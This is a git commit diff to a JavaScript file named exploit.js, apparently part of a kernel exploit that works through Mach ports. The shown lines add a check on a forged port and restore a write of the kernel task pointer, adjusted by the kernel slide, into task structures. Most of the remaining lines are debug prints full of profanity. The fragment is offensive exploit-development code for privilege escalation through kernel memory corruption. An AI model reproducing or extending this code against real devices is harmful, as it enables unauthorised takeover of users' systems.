From afd32c3f9934e6425a77ed4b5a185b8fd6cb69a3 Mon Sep 17 00:00:00 2001
From: spv420 <spv@spv.sh>
Date: Fri, 29 Jul 2022 12:54:14 -0400
Subject: aaaaaaaa

---
 src/js/kexp/exploit.js | 10 +++++++---
 1 file changed, 7 insertions(+), 3 deletions(-)

(limited to 'src/js/kexp')

diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index e854ba0..fbca86c 100755
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -496,7 +496,11 @@ again: while (true) {
 	 */
 //	var fake_port = mach_ports_lookup_shit();
 	printf("fuck\n");
-	printf("%x\n", fake_port);
+	if (fake_port === 0 || fake_port === 0xffffffff) {
+		printf("fuck. fake port is fucked.\n");
+		continue again;
+	}
+	scall("printf", "%x\n", fake_port);
 	printf("fuck\n");
 	// todo: add mach_port_valid stuff
 	printf("fuck\n");
@@ -504,8 +508,8 @@ again: while (true) {
 	printf("fuck\n");
 	write_u32(kport + 0x50, kptr + 0x78 - TASK_BSDINFO_OFFSET);
 	printf("fuck\n");
-//	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
-	write_u32(ptr, 0x73707621);
+	write_u32(ptr, find_kerneltask() + kslide - BSDINFO_PID_OFFSET);
+//	write_u32(ptr, 0x73707621 - BSDINFO_PID_OFFSET);
 	printf("fuck\n");
 	var tst_str = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
 	printf("fuck\n");
-- 
cgit v1.2.3